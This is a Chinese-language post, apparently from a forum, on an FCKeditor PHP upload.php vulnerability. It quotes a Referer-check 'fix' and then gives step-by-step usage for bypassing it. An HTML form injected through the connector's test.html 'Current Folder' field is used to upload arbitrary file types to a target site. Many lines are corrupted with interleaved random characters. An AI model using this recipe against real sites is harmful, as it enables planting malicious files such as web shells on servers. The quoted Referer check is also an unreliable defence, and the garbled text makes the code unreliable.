漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php% p& x- C& _ x; b
网上给出的修复方案是- W' Q, M/ ~! w# ~
修复方法,删除FCK编辑器用其他的编辑器
% I2 g: [9 K; z+ \3 V或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件6 A/ `* T+ Y' d$ N7 w
在! T. L& h0 E( m3 X% K* u6 E
require(‘config.php’);; j) r- C- G4 j' h5 w$ A
require(‘util.php’);; \: n1 D( H) {; k* G
的下面添加以下代码—————————–! P0 a4 R& h/ L" ]* T
//防止外部提交
$ r+ V" S, O! w9 c) ?function outsidepost()
' Z/ @3 g8 \% z" W1 t{' @& Y: b, q# c
$servername=$_SERVER['SERVER_NAME'];) G" S9 f# c3 v6 Q! ]/ m
$sub_from=@$_SERVER['HTTP_REFERER'];/ }. Y, q* q0 x2 d4 O/ l
$sub_len=strlen($servername);
' S, y) g9 R8 ~. z; r! \. E* u$checkfrom=substr($sub_from,7,$sub_len);
# U: H' B" j: O% d4 hif($checkfrom!=$servername){4 K& [ w/ J/ ]0 O# r" J- g( t
echo(“you don’t outsidepost!”);
0 ?1 r1 C7 U. O4 Q5 z4 G/ n: [0 Oexit;/ V+ Z3 R4 P K( u' V! l& ^, Z
}
7 `: d, r* |8 h4 u- P0 Q}% q6 `+ e/ Q3 l6 _" p5 @, M
outsidepost();# Z( o4 }$ K! p5 h2 L+ @0 I
防止外部提交,但是没有防止内部提交,
* g7 u- ?3 @) l# F2 r) {( g. b) q% J5 v利用方法:
2 Y; n/ o7 _" s3 U# x1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html* _$ ^- _- b9 z+ d: l* H6 |6 \: c& s
2,在Current Folder 框输入
u$ G0 u0 v3 u& h2 n<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
2 ?/ ~3 g9 l4 b$ i4 J; \然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
" J5 H; a" C# ]! ^, QPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |